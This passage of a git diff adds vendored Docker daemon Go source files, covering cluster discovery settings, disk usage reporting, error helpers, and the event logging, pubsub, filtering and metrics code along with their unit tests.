+func (d *daemonDiscoveryReloader) Stop() { + d.ticker.Stop() + d.term <- true +} + +func parseDiscoveryOptions(backendAddress string, clusterOpts map[string]string) (time.Duration, discovery.Backend, error) { + heartbeat, ttl, err := discoveryOpts(clusterOpts) + if err != nil { + return 0, nil, err + } + + backend, err := discovery.New(backendAddress, heartbeat, ttl, clusterOpts) + if err != nil { + return 0, nil, err + } + return heartbeat, backend, nil +} + +// modifiedDiscoverySettings returns whether the discovery configuration has been modified or not. +func modifiedDiscoverySettings(config *Config, backendType, advertise string, clusterOpts map[string]string) bool { + if config.ClusterStore != backendType || config.ClusterAdvertise != advertise { + return true + } + + if (config.ClusterOpts == nil && clusterOpts == nil) || + (config.ClusterOpts == nil && len(clusterOpts) == 0) || + (len(config.ClusterOpts) == 0 && clusterOpts == nil) { + return false + } + + return !reflect.DeepEqual(config.ClusterOpts, clusterOpts) +} diff --git a/vendor/github.com/docker/docker/daemon/discovery_test.go b/vendor/github.com/docker/docker/daemon/discovery_test.go new file mode 100644 index 0000000000..336973c516 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/discovery_test.go @@ -0,0 +1,164 @@ +package daemon + +import ( + "testing" + "time" +) + +func TestDiscoveryOpts(t *testing.T) { + clusterOpts := map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "5"} + heartbeat, ttl, err := discoveryOpts(clusterOpts) + if err == nil { + t.Fatalf("discovery.ttl < discovery.heartbeat must fail") + } + + clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "10"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err == nil { + t.Fatalf("discovery.ttl == discovery.heartbeat must fail") + } + + clusterOpts = map[string]string{"discovery.heartbeat": "-10", "discovery.ttl": "10"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if 
err == nil { + t.Fatalf("negative discovery.heartbeat must fail") + } + + clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "-10"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err == nil { + t.Fatalf("negative discovery.ttl must fail") + } + + clusterOpts = map[string]string{"discovery.heartbeat": "invalid"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err == nil { + t.Fatalf("invalid discovery.heartbeat must fail") + } + + clusterOpts = map[string]string{"discovery.ttl": "invalid"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err == nil { + t.Fatalf("invalid discovery.ttl must fail") + } + + clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "20"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err != nil { + t.Fatal(err) + } + + if heartbeat != 10*time.Second { + t.Fatalf("Heartbeat - Expected : %v, Actual : %v", 10*time.Second, heartbeat) + } + + if ttl != 20*time.Second { + t.Fatalf("TTL - Expected : %v, Actual : %v", 20*time.Second, ttl) + } + + clusterOpts = map[string]string{"discovery.heartbeat": "10"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err != nil { + t.Fatal(err) + } + + if heartbeat != 10*time.Second { + t.Fatalf("Heartbeat - Expected : %v, Actual : %v", 10*time.Second, heartbeat) + } + + expected := 10 * defaultDiscoveryTTLFactor * time.Second + if ttl != expected { + t.Fatalf("TTL - Expected : %v, Actual : %v", expected, ttl) + } + + clusterOpts = map[string]string{"discovery.ttl": "30"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err != nil { + t.Fatal(err) + } + + if ttl != 30*time.Second { + t.Fatalf("TTL - Expected : %v, Actual : %v", 30*time.Second, ttl) + } + + expected = 30 * time.Second / defaultDiscoveryTTLFactor + if heartbeat != expected { + t.Fatalf("Heartbeat - Expected : %v, Actual : %v", expected, heartbeat) + } + + clusterOpts = map[string]string{} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err != 
nil { + t.Fatal(err) + } + + if heartbeat != defaultDiscoveryHeartbeat { + t.Fatalf("Heartbeat - Expected : %v, Actual : %v", defaultDiscoveryHeartbeat, heartbeat) + } + + expected = defaultDiscoveryHeartbeat * defaultDiscoveryTTLFactor + if ttl != expected { + t.Fatalf("TTL - Expected : %v, Actual : %v", expected, ttl) + } +} + +func TestModifiedDiscoverySettings(t *testing.T) { + cases := []struct { + current *Config + modified *Config + expected bool + }{ + { + current: discoveryConfig("foo", "bar", map[string]string{}), + modified: discoveryConfig("foo", "bar", map[string]string{}), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), + modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", map[string]string{}), + modified: discoveryConfig("foo", "bar", nil), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("foo", "bar", map[string]string{}), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("baz", "bar", nil), + expected: true, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("foo", "baz", nil), + expected: true, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), + expected: true, + }, + } + + for _, c := range cases { + got := modifiedDiscoverySettings(c.current, c.modified.ClusterStore, c.modified.ClusterAdvertise, c.modified.ClusterOpts) + if c.expected != got { + t.Fatalf("expected %v, got %v: current config %v, new config %v", c.expected, got, c.current, c.modified) + } + } +} + +func discoveryConfig(backendAddr, advertiseAddr string, opts map[string]string) *Config { + return &Config{ + CommonConfig: CommonConfig{ + ClusterStore: backendAddr, + ClusterAdvertise: advertiseAddr, + ClusterOpts: opts, + 
}, + } +} diff --git a/vendor/github.com/docker/docker/daemon/disk_usage.go b/vendor/github.com/docker/docker/daemon/disk_usage.go new file mode 100644 index 0000000000..c3b918660d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/disk_usage.go @@ -0,0 +1,100 @@ +package daemon + +import ( + "fmt" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/directory" + "github.com/docker/docker/volume" +) + +func (daemon *Daemon) getLayerRefs() map[layer.ChainID]int { + tmpImages := daemon.imageStore.Map() + layerRefs := map[layer.ChainID]int{} + for id, img := range tmpImages { + dgst := digest.Digest(id) + if len(daemon.referenceStore.References(dgst)) == 0 && len(daemon.imageStore.Children(id)) != 0 { + continue + } + + rootFS := *img.RootFS + rootFS.DiffIDs = nil + for _, id := range img.RootFS.DiffIDs { + rootFS.Append(id) + chid := rootFS.ChainID() + layerRefs[chid]++ + } + } + + return layerRefs +} + +// SystemDiskUsage returns information about the daemon data disk usage +func (daemon *Daemon) SystemDiskUsage() (*types.DiskUsage, error) { + // Retrieve container list + allContainers, err := daemon.Containers(&types.ContainerListOptions{ + Size: true, + All: true, + }) + if err != nil { + return nil, fmt.Errorf("failed to retrieve container list: %v", err) + } + + // Get all top images with extra attributes + allImages, err := daemon.Images(filters.NewArgs(), false, true) + if err != nil { + return nil, fmt.Errorf("failed to retrieve image list: %v", err) + } + + // Get all local volumes + allVolumes := []*types.Volume{} + getLocalVols := func(v volume.Volume) error { + name := v.Name() + refs := daemon.volumes.Refs(v) + + tv := volumeToAPIType(v) + sz, err := directory.Size(v.Path()) + if err != nil { + logrus.Warnf("failed to determine size of volume %v", name) + sz = -1 + } + 
tv.UsageData = &types.VolumeUsageData{Size: sz, RefCount: int64(len(refs))} + allVolumes = append(allVolumes, tv) + + return nil + } + + err = daemon.traverseLocalVolumes(getLocalVols) + if err != nil { + return nil, err + } + + // Get total layers size on disk + layerRefs := daemon.getLayerRefs() + allLayers := daemon.layerStore.Map() + var allLayersSize int64 + for _, l := range allLayers { + size, err := l.DiffSize() + if err == nil { + if _, ok := layerRefs[l.ChainID()]; ok { + allLayersSize += size + } else { + logrus.Warnf("found leaked image layer %v", l.ChainID()) + } + } else { + logrus.Warnf("failed to get diff size for layer %v", l.ChainID()) + } + + } + + return &types.DiskUsage{ + LayersSize: allLayersSize, + Containers: allContainers, + Volumes: allVolumes, + Images: allImages, + }, nil +} diff --git a/vendor/github.com/docker/docker/daemon/errors.go b/vendor/github.com/docker/docker/daemon/errors.go new file mode 100644 index 0000000000..566a32f175 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/errors.go @@ -0,0 +1,57 @@ +package daemon + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/errors" + "github.com/docker/docker/reference" +) + +func (d *Daemon) imageNotExistToErrcode(err error) error { + if dne, isDNE := err.(ErrImageDoesNotExist); isDNE { + if strings.Contains(dne.RefOrID, "@") { + e := fmt.Errorf("No such image: %s", dne.RefOrID) + return errors.NewRequestNotFoundError(e) + } + tag := reference.DefaultTag + ref, err := reference.ParseNamed(dne.RefOrID) + if err != nil { + e := fmt.Errorf("No such image: %s:%s", dne.RefOrID, tag) + return errors.NewRequestNotFoundError(e) + } + if tagged, isTagged := ref.(reference.NamedTagged); isTagged { + tag = tagged.Tag() + } + e := fmt.Errorf("No such image: %s:%s", ref.Name(), tag) + return errors.NewRequestNotFoundError(e) + } + return err +} + +type errNotRunning struct { + containerID string +} + +func (e errNotRunning) Error() string { + return fmt.Sprintf("Container 
%s is not running", e.containerID) +} + +func (e errNotRunning) ContainerIsRunning() bool { + return false +} + +func errContainerIsRestarting(containerID string) error { + err := fmt.Errorf("Container %s is restarting, wait until the container is running", containerID) + return errors.NewRequestConflictError(err) +} + +func errExecNotFound(id string) error { + err := fmt.Errorf("No such exec instance '%s' found in daemon", id) + return errors.NewRequestNotFoundError(err) +} + +func errExecPaused(id string) error { + err := fmt.Errorf("Container %s is paused, unpause the container before exec", id) + return errors.NewRequestConflictError(err) +} diff --git a/vendor/github.com/docker/docker/daemon/events.go b/vendor/github.com/docker/docker/daemon/events.go new file mode 100644 index 0000000000..8fe8e1b640 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/events.go @@ -0,0 +1,132 @@ +package daemon + +import ( + "strings" + "time" + + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/container" + daemonevents "github.com/docker/docker/daemon/events" + "github.com/docker/libnetwork" +) + +// LogContainerEvent generates an event related to a container with only the default attributes. +func (daemon *Daemon) LogContainerEvent(container *container.Container, action string) { + daemon.LogContainerEventWithAttributes(container, action, map[string]string{}) +} + +// LogContainerEventWithAttributes generates an event related to a container with specific given attributes. 
+func (daemon *Daemon) LogContainerEventWithAttributes(container *container.Container, action string, attributes map[string]string) { + copyAttributes(attributes, container.Config.Labels) + if container.Config.Image != "" { + attributes["image"] = container.Config.Image + } + attributes["name"] = strings.TrimLeft(container.Name, "/") + + actor := events.Actor{ + ID: container.ID, + Attributes: attributes, + } + daemon.EventsService.Log(action, events.ContainerEventType, actor) +} + +// LogImageEvent generates an event related to an image with only the default attributes. +func (daemon *Daemon) LogImageEvent(imageID, refName, action string) { + daemon.LogImageEventWithAttributes(imageID, refName, action, map[string]string{}) +} + +// LogImageEventWithAttributes generates an event related to an image with specific given attributes. +func (daemon *Daemon) LogImageEventWithAttributes(imageID, refName, action string, attributes map[string]string) { + img, err := daemon.GetImage(imageID) + if err == nil && img.Config != nil { + // image has not been removed yet. + // it could be missing if the event is `delete`. + copyAttributes(attributes, img.Config.Labels) + } + if refName != "" { + attributes["name"] = refName + } + actor := events.Actor{ + ID: imageID, + Attributes: attributes, + } + + daemon.EventsService.Log(action, events.ImageEventType, actor) +} + +// LogPluginEvent generates an event related to a plugin with only the default attributes. +func (daemon *Daemon) LogPluginEvent(pluginID, refName, action string) { + daemon.LogPluginEventWithAttributes(pluginID, refName, action, map[string]string{}) +} + +// LogPluginEventWithAttributes generates an event related to a plugin with specific given attributes. 
+func (daemon *Daemon) LogPluginEventWithAttributes(pluginID, refName, action string, attributes map[string]string) { + attributes["name"] = refName + actor := events.Actor{ + ID: pluginID, + Attributes: attributes, + } + daemon.EventsService.Log(action, events.PluginEventType, actor) +} + +// LogVolumeEvent generates an event related to a volume. +func (daemon *Daemon) LogVolumeEvent(volumeID, action string, attributes map[string]string) { + actor := events.Actor{ + ID: volumeID, + Attributes: attributes, + } + daemon.EventsService.Log(action, events.VolumeEventType, actor) +} + +// LogNetworkEvent generates an event related to a network with only the default attributes. +func (daemon *Daemon) LogNetworkEvent(nw libnetwork.Network, action string) { + daemon.LogNetworkEventWithAttributes(nw, action, map[string]string{}) +} + +// LogNetworkEventWithAttributes generates an event related to a network with specific given attributes. +func (daemon *Daemon) LogNetworkEventWithAttributes(nw libnetwork.Network, action string, attributes map[string]string) { + attributes["name"] = nw.Name() + attributes["type"] = nw.Type() + actor := events.Actor{ + ID: nw.ID(), + Attributes: attributes, + } + daemon.EventsService.Log(action, events.NetworkEventType, actor) +} + +// LogDaemonEventWithAttributes generates an event related to the daemon itself with specific given attributes. +func (daemon *Daemon) LogDaemonEventWithAttributes(action string, attributes map[string]string) { + if daemon.EventsService != nil { + if info, err := daemon.SystemInfo(); err == nil && info.Name != "" { + attributes["name"] = info.Name + } + actor := events.Actor{ + ID: daemon.ID, + Attributes: attributes, + } + daemon.EventsService.Log(action, events.DaemonEventType, actor) + } +} + +// SubscribeToEvents returns the currently record of events, a channel to stream new events from, and a function to cancel the stream of events. 
+func (daemon *Daemon) SubscribeToEvents(since, until time.Time, filter filters.Args) ([]events.Message, chan interface{}) { + ef := daemonevents.NewFilter(filter) + return daemon.EventsService.SubscribeTopic(since, until, ef) +} + +// UnsubscribeFromEvents stops the event subscription for a client by closing the +// channel where the daemon sends events to. +func (daemon *Daemon) UnsubscribeFromEvents(listener chan interface{}) { + daemon.EventsService.Evict(listener) +} + +// copyAttributes guarantees that labels are not mutated by event triggers. +func copyAttributes(attributes, labels map[string]string) { + if labels == nil { + return + } + for k, v := range labels { + attributes[k] = v + } +} diff --git a/vendor/github.com/docker/docker/daemon/events/events.go b/vendor/github.com/docker/docker/daemon/events/events.go new file mode 100644 index 0000000000..0bf105f54d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/events/events.go @@ -0,0 +1,158 @@ +package events + +import ( + "sync" + "time" + + eventtypes "github.com/docker/docker/api/types/events" + "github.com/docker/docker/pkg/pubsub" +) + +const ( + eventsLimit = 64 + bufferSize = 1024 +) + +// Events is pubsub channel for events generated by the engine. +type Events struct { + mu sync.Mutex + events []eventtypes.Message + pub *pubsub.Publisher +} + +// New returns new *Events instance +func New() *Events { + return &Events{ + events: make([]eventtypes.Message, 0, eventsLimit), + pub: pubsub.NewPublisher(100*time.Millisecond, bufferSize), + } +} + +// Subscribe adds new listener to events, returns slice of 64 stored +// last events, a channel in which you can expect new events (in form +// of interface{}, so you need type assertion), and a function to call +// to stop the stream of events. 
+func (e *Events) Subscribe() ([]eventtypes.Message, chan interface{}, func()) { + eventSubscribers.Inc() + e.mu.Lock() + current := make([]eventtypes.Message, len(e.events)) + copy(current, e.events) + l := e.pub.Subscribe() + e.mu.Unlock() + + cancel := func() { + e.Evict(l) + } + return current, l, cancel +} + +// SubscribeTopic adds new listener to events, returns slice of 64 stored +// last events, a channel in which you can expect new events (in form +// of interface{}, so you need type assertion). +func (e *Events) SubscribeTopic(since, until time.Time, ef *Filter) ([]eventtypes.Message, chan interface{}) { + eventSubscribers.Inc() + e.mu.Lock() + + var topic func(m interface{}) bool + if ef != nil && ef.filter.Len() > 0 { + topic = func(m interface{}) bool { return ef.Include(m.(eventtypes.Message)) } + } + + buffered := e.loadBufferedEvents(since, until, topic) + + var ch chan interface{} + if topic != nil { + ch = e.pub.SubscribeTopic(topic) + } else { + // Subscribe to all events if there are no filters + ch = e.pub.Subscribe() + } + + e.mu.Unlock() + return buffered, ch +} + +// Evict evicts listener from pubsub +func (e *Events) Evict(l chan interface{}) { + eventSubscribers.Dec() + e.pub.Evict(l) +} + +// Log broadcasts event to listeners. Each listener has 100 millisecond for +// receiving event or it will be skipped. 
+func (e *Events) Log(action, eventType string, actor eventtypes.Actor) { + eventsCounter.Inc() + now := time.Now().UTC() + jm := eventtypes.Message{ + Action: action, + Type: eventType, + Actor: actor, + Time: now.Unix(), + TimeNano: now.UnixNano(), + } + + // fill deprecated fields for container and images + switch eventType { + case eventtypes.ContainerEventType: + jm.ID = actor.ID + jm.Status = action + jm.From = actor.Attributes["image"] + case eventtypes.ImageEventType: + jm.ID = actor.ID + jm.Status = action + } + + e.mu.Lock() + if len(e.events) == cap(e.events) { + // discard oldest event + copy(e.events, e.events[1:]) + e.events[len(e.events)-1] = jm + } else { + e.events = append(e.events, jm) + } + e.mu.Unlock() + e.pub.Publish(jm) +} + +// SubscribersCount returns number of event listeners +func (e *Events) SubscribersCount() int { + return e.pub.Len() +} + +// loadBufferedEvents iterates over the cached events in the buffer +// and returns those that were emitted between two specific dates. +// It uses `time.Unix(seconds, nanoseconds)` to generate valid dates with those arguments. +// It filters those buffered messages with a topic function if it's not nil, otherwise it adds all messages. +func (e *Events) loadBufferedEvents(since, until time.Time, topic func(interface{}) bool) []eventtypes.Message { + var buffered []eventtypes.Message + if since.IsZero() && until.IsZero() { + return buffered + } + + var sinceNanoUnix int64 + if !since.IsZero() { + sinceNanoUnix = since.UnixNano() + } + + var untilNanoUnix int64 + if !until.IsZero() { + untilNanoUnix = until.UnixNano() + } + + for i := len(e.events) - 1; i >= 0; i-- { + ev := e.events[i] + + if ev.TimeNano < sinceNanoUnix { + break + } + + if untilNanoUnix > 0 && ev.TimeNano > untilNanoUnix { + continue + } + + if topic == nil || topic(ev) { + buffered = append([]eventtypes.Message{ev}, buffered...) 
+ } + } + return buffered +} diff --git a/vendor/github.com/docker/docker/daemon/events/events_test.go b/vendor/github.com/docker/docker/daemon/events/events_test.go new file mode 100644 index 0000000000..bbd160f901 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/events/events_test.go @@ -0,0 +1,275 @@ +package events + +import ( + "fmt" + "testing" + "time" + + "github.com/docker/docker/api/types/events" + timetypes "github.com/docker/docker/api/types/time" + eventstestutils "github.com/docker/docker/daemon/events/testutils" +) + +func TestEventsLog(t *testing.T) { + e := New() + _, l1, _ := e.Subscribe() + _, l2, _ := e.Subscribe() + defer e.Evict(l1) + defer e.Evict(l2) + count := e.SubscribersCount() + if count != 2 { + t.Fatalf("Must be 2 subscribers, got %d", count) + } + actor := events.Actor{ + ID: "cont", + Attributes: map[string]string{"image": "image"}, + } + e.Log("test", events.ContainerEventType, actor) + select { + case msg := <-l1: + jmsg, ok := msg.(events.Message) + if !ok { + t.Fatalf("Unexpected type %T", msg) + } + if len(e.events) != 1 { + t.Fatalf("Must be only one event, got %d", len(e.events)) + } + if jmsg.Status != "test" { + t.Fatalf("Status should be test, got %s", jmsg.Status) + } + if jmsg.ID != "cont" { + t.Fatalf("ID should be cont, got %s", jmsg.ID) + } + if jmsg.From != "image" { + t.Fatalf("From should be image, got %s", jmsg.From) + } + case <-time.After(1 * time.Second): + t.Fatal("Timeout waiting for broadcasted message") + } + select { + case msg := <-l2: + jmsg, ok := msg.(events.Message) + if !ok { + t.Fatalf("Unexpected type %T", msg) + } + if len(e.events) != 1 { + t.Fatalf("Must be only one event, got %d", len(e.events)) + } + if jmsg.Status != "test" { + t.Fatalf("Status should be test, got %s", jmsg.Status) + } + if jmsg.ID != "cont" { + t.Fatalf("ID should be cont, got %s", jmsg.ID) + } + if jmsg.From != "image" { + t.Fatalf("From should be image, got %s", jmsg.From) + } + case <-time.After(1 * 
time.Second): + t.Fatal("Timeout waiting for broadcasted message") + } +} + +func TestEventsLogTimeout(t *testing.T) { + e := New() + _, l, _ := e.Subscribe() + defer e.Evict(l) + + c := make(chan struct{}) + go func() { + actor := events.Actor{ + ID: "image", + } + e.Log("test", events.ImageEventType, actor) + close(c) + }() + + select { + case <-c: + case <-time.After(time.Second): + t.Fatal("Timeout publishing message") + } +} + +func TestLogEvents(t *testing.T) { + e := New() + + for i := 0; i < eventsLimit+16; i++ { + action := fmt.Sprintf("action_%d", i) + id := fmt.Sprintf("cont_%d", i) + from := fmt.Sprintf("image_%d", i) + + actor := events.Actor{ + ID: id, + Attributes: map[string]string{"image": from}, + } + e.Log(action, events.ContainerEventType, actor) + } + time.Sleep(50 * time.Millisecond) + current, l, _ := e.Subscribe() + for i := 0; i < 10; i++ { + num := i + eventsLimit + 16 + action := fmt.Sprintf("action_%d", num) + id := fmt.Sprintf("cont_%d", num) + from := fmt.Sprintf("image_%d", num) + + actor := events.Actor{ + ID: id, + Attributes: map[string]string{"image": from}, + } + e.Log(action, events.ContainerEventType, actor) + } + if len(e.events) != eventsLimit { + t.Fatalf("Must be %d events, got %d", eventsLimit, len(e.events)) + } + + var msgs []events.Message + for len(msgs) < 10 { + m := <-l + jm, ok := (m).(events.Message) + if !ok { + t.Fatalf("Unexpected type %T", m) + } + msgs = append(msgs, jm) + } + if len(current) != eventsLimit { + t.Fatalf("Must be %d events, got %d", eventsLimit, len(current)) + } + first := current[0] + if first.Status != "action_16" { + t.Fatalf("First action is %s, must be action_16", first.Status) + } + last := current[len(current)-1] + if last.Status != "action_79" { + t.Fatalf("Last action is %s, must be action_79", last.Status) + } + + firstC := msgs[0] + if firstC.Status != "action_80" { + t.Fatalf("First action is %s, must be action_80", firstC.Status) + } + lastC := msgs[len(msgs)-1] + if lastC.Status 
!= "action_89" { + t.Fatalf("Last action is %s, must be action_89", lastC.Status) + } +} + +// https://github.com/docker/docker/issues/20999 +// Fixtures: +// +//2016-03-07T17:28:03.022433271+02:00 container die 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover) +//2016-03-07T17:28:03.091719377+02:00 network disconnect 19c5ed41acb798f26b751e0035cd7821741ab79e2bbd59a66b5fd8abf954eaa0 (type=bridge, container=0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079, name=bridge) +//2016-03-07T17:28:03.129014751+02:00 container destroy 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover) +func TestLoadBufferedEvents(t *testing.T) { + now := time.Now() + f, err := timetypes.GetTimestamp("2016-03-07T17:28:03.100000000+02:00", now) + if err != nil { + t.Fatal(err) + } + s, sNano, err := timetypes.ParseTimestamps(f, -1) + if err != nil { + t.Fatal(err) + } + + m1, err := eventstestutils.Scan("2016-03-07T17:28:03.022433271+02:00 container die 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)") + if err != nil { + t.Fatal(err) + } + m2, err := eventstestutils.Scan("2016-03-07T17:28:03.091719377+02:00 network disconnect 19c5ed41acb798f26b751e0035cd7821741ab79e2bbd59a66b5fd8abf954eaa0 (type=bridge, container=0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079, name=bridge)") + if err != nil { + t.Fatal(err) + } + m3, err := eventstestutils.Scan("2016-03-07T17:28:03.129014751+02:00 container destroy 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)") + if err != nil { + t.Fatal(err) + } + + events := &Events{ + events: []events.Message{*m1, *m2, *m3}, + } + + since := time.Unix(s, sNano) + until := time.Time{} + + out := events.loadBufferedEvents(since, until, nil) + if len(out) != 1 { + t.Fatalf("expected 1 message, got %d: %v", len(out), out) + } +} + +func 
TestLoadBufferedEventsOnlyFromPast(t *testing.T) { + now := time.Now() + f, err := timetypes.GetTimestamp("2016-03-07T17:28:03.090000000+02:00", now) + if err != nil { + t.Fatal(err) + } + s, sNano, err := timetypes.ParseTimestamps(f, 0) + if err != nil { + t.Fatal(err) + } + + f, err = timetypes.GetTimestamp("2016-03-07T17:28:03.100000000+02:00", now) + if err != nil { + t.Fatal(err) + } + u, uNano, err := timetypes.ParseTimestamps(f, 0) + if err != nil { + t.Fatal(err) + } + + m1, err := eventstestutils.Scan("2016-03-07T17:28:03.022433271+02:00 container die 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)") + if err != nil { + t.Fatal(err) + } + m2, err := eventstestutils.Scan("2016-03-07T17:28:03.091719377+02:00 network disconnect 19c5ed41acb798f26b751e0035cd7821741ab79e2bbd59a66b5fd8abf954eaa0 (type=bridge, container=0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079, name=bridge)") + if err != nil { + t.Fatal(err) + } + m3, err := eventstestutils.Scan("2016-03-07T17:28:03.129014751+02:00 container destroy 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)") + if err != nil { + t.Fatal(err) + } + + events := &Events{ + events: []events.Message{*m1, *m2, *m3}, + } + + since := time.Unix(s, sNano) + until := time.Unix(u, uNano) + + out := events.loadBufferedEvents(since, until, nil) + if len(out) != 1 { + t.Fatalf("expected 1 message, got %d: %v", len(out), out) + } + + if out[0].Type != "network" { + t.Fatalf("expected network event, got %s", out[0].Type) + } +} + +// #13753 +func TestIngoreBufferedWhenNoTimes(t *testing.T) { + m1, err := eventstestutils.Scan("2016-03-07T17:28:03.022433271+02:00 container die 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)") + if err != nil { + t.Fatal(err) + } + m2, err := eventstestutils.Scan("2016-03-07T17:28:03.091719377+02:00 network disconnect 
19c5ed41acb798f26b751e0035cd7821741ab79e2bbd59a66b5fd8abf954eaa0 (type=bridge, container=0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079, name=bridge)") + if err != nil { + t.Fatal(err) + } + m3, err := eventstestutils.Scan("2016-03-07T17:28:03.129014751+02:00 container destroy 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)") + if err != nil { + t.Fatal(err) + } + + events := &Events{ + events: []events.Message{*m1, *m2, *m3}, + } + + since := time.Time{} + until := time.Time{} + + out := events.loadBufferedEvents(since, until, nil) + if len(out) != 0 { + t.Fatalf("expected 0 buffered events, got %q", out) + } +} diff --git a/vendor/github.com/docker/docker/daemon/events/filter.go b/vendor/github.com/docker/docker/daemon/events/filter.go new file mode 100644 index 0000000000..5c9c527692 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/events/filter.go @@ -0,0 +1,110 @@ +package events + +import ( + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/reference" +) + +// Filter can filter out docker events from a stream +type Filter struct { + filter filters.Args +} + +// NewFilter creates a new Filter +func NewFilter(filter filters.Args) *Filter { + return &Filter{filter: filter} +} + +// Include returns true when the event ev is included by the filters +func (ef *Filter) Include(ev events.Message) bool { + return ef.matchEvent(ev) && + ef.filter.ExactMatch("type", ev.Type) && + ef.matchDaemon(ev) && + ef.matchContainer(ev) && + ef.matchPlugin(ev) && + ef.matchVolume(ev) && + ef.matchNetwork(ev) && + ef.matchImage(ev) && + ef.matchLabels(ev.Actor.Attributes) +} + +func (ef *Filter) matchEvent(ev events.Message) bool { + // #25798 if an event filter contains either health_status, exec_create or exec_start without a colon + // Let's to a FuzzyMatch instead of an ExactMatch. 
+ if ef.filterContains("event", map[string]struct{}{"health_status": {}, "exec_create": {}, "exec_start": {}}) { + return ef.filter.FuzzyMatch("event", ev.Action) + } + return ef.filter.ExactMatch("event", ev.Action) +} + +func (ef *Filter) filterContains(field string, values map[string]struct{}) bool { + for _, v := range ef.filter.Get(field) { + if _, ok := values[v]; ok { + return true + } + } + return false +} + +func (ef *Filter) matchLabels(attributes map[string]string) bool { + if !ef.filter.Include("label") { + return true + } + return ef.filter.MatchKVList("label", attributes) +} + +func (ef *Filter) matchDaemon(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.DaemonEventType) +} + +func (ef *Filter) matchContainer(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.ContainerEventType) +} + +func (ef *Filter) matchPlugin(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.PluginEventType) +} + +func (ef *Filter) matchVolume(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.VolumeEventType) +} + +func (ef *Filter) matchNetwork(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.NetworkEventType) +} + +func (ef *Filter) fuzzyMatchName(ev events.Message, eventType string) bool { + return ef.filter.FuzzyMatch(eventType, ev.Actor.ID) || + ef.filter.FuzzyMatch(eventType, ev.Actor.Attributes["name"]) +} + +// matchImage matches against both event.Actor.ID (for image events) +// and event.Actor.Attributes["image"] (for container events), so that any container that was created +// from an image will be included in the image events. Also compare both +// against the stripped repo name without any tags. 
+func (ef *Filter) matchImage(ev events.Message) bool { + id := ev.Actor.ID + nameAttr := "image" + var imageName string + + if ev.Type == events.ImageEventType { + nameAttr = "name" + } + + if n, ok := ev.Actor.Attributes[nameAttr]; ok { + imageName = n + } + return ef.filter.ExactMatch("image", id) || + ef.filter.ExactMatch("image", imageName) || + ef.filter.ExactMatch("image", stripTag(id)) || + ef.filter.ExactMatch("image", stripTag(imageName)) +} + +func stripTag(image string) string { + ref, err := reference.ParseNamed(image) + if err != nil { + return image + } + return ref.Name() +} diff --git a/vendor/github.com/docker/docker/daemon/events/metrics.go b/vendor/github.com/docker/docker/daemon/events/metrics.go new file mode 100644 index 0000000000..c9a89ec0ed --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/events/metrics.go @@ -0,0 +1,15 @@ +package events + +import "github.com/docker/go-metrics" + +var ( + eventsCounter metrics.Counter + eventSubscribers metrics.Gauge +) + +func init() { + ns := metrics.NewNamespace("engine", "daemon", nil) + eventsCounter = ns.NewCounter("events", "The number of events logged") + eventSubscribers = ns.NewGauge("events_subscribers", "The number of current subscribers to events", metrics.Total) + 